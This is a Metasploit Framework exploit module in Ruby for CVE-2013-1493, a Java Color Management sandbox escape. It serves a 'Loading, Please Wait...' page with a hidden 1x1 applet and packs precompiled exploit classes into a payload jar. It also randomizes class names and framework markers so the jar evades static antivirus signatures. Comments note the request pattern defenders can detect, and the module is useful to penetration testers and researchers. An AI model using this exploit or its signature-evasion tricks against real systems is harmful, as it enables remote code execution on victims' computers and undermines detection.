##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
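##

# Framework core and the Rex support library (HTTP server, Zip/Jar
# helpers used by payload.encoded_jar below).
require 'msf/core'
require 'rex'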
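# Browser-side delivery for CVE-2013-1493 (Java Color Management Module).
#
# The Ruby in this module only stages the request flow: four precompiled
# class files shipped under data/exploits/cve-2013-1493 are packed into the
# payload jar and referenced from a 1x1 <applet> tag. The per-request
# randomized jar/class names and the rewriting of the "metasploit" /
# "Payload" markers inside jar entries exist to defeat static signatures,
# so detection is better keyed on the request pattern (an HTML page with a
# hidden applet followed by a GET for a random *.jar) than on file names.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  # Module metadata. 'DefaultTarget' => 1 selects the native Windows x86
  # payload; the generic Java target is index 0.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the precompiled applet classes once and renames the entry class.
  #
  # The replacement name has the same length as "Init" so the
  # length-prefixed constant-pool entries inside the class file stay
  # consistent after the in-place byte substitution.
  def setup
    @init_class           = read_class_file('Init.class')
    @leak_class           = read_class_file('Leak.class')
    @buffered_image_class = read_class_file('MyBufferedImage.class')
    @color_space_class    = read_class_file('MyColorSpace.class')

    @init_class_name = rand_text_alpha('Init'.length)
    # Every occurrence of the bytes "Init" in the class file is rewritten.
    @init_class.gsub!('Init', @init_class_name)
    super
  end

  # HTTP dispatcher for the module's resource.
  #
  # * `*.jar`          -> the freshly built applet jar (octet-stream)
  # * trailing `/`     -> the loader page, after checking a payload can be
  #                       regenerated for this client (404 otherwise)
  # * anything else    -> redirect to the resource root
  #
  # @param cli     [Object] client connection handed in by the HTTP server mixin
  # @param request [Object] parsed request; only `#uri` is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      # Local is deliberately not named `payload`, which is also the
      # framework accessor used in build_jar.
      regenerated = regenerate_payload(cli)
      unless regenerated
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Builds the loader page.
  #
  # The archive name is random on every call, but the title/body text
  # "Loading, Please Wait..." and the 1x1 applet are constant and are the
  # observable artifacts of this page.
  #
  # @return [String] HTML document referencing the applet jar
  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html << %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html << %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html << %Q|</applet></body></html>|
    html
  end

  private

  # Packages the encoded payload jar together with the four applet classes.
  #
  # Entry names and contents have the framework's own markers
  # ("metasploit", "Payload") replaced by random strings of equal length
  # before the manifest is rebuilt, so the served jar carries no fixed
  # framework identifiers.
  #
  # @return [Object] the jar object accepted by send_response
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str    = rand_text_alpha('payload'.length)
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end
    jar.build_manifest
    jar
  end

  # Reads one precompiled applet class shipped with the framework.
  #
  # @param name [String] file name under data/exploits/cve-2013-1493
  # @return [String] raw (binary) class file bytes
  def read_class_file(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.binread(path)
  end
end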
|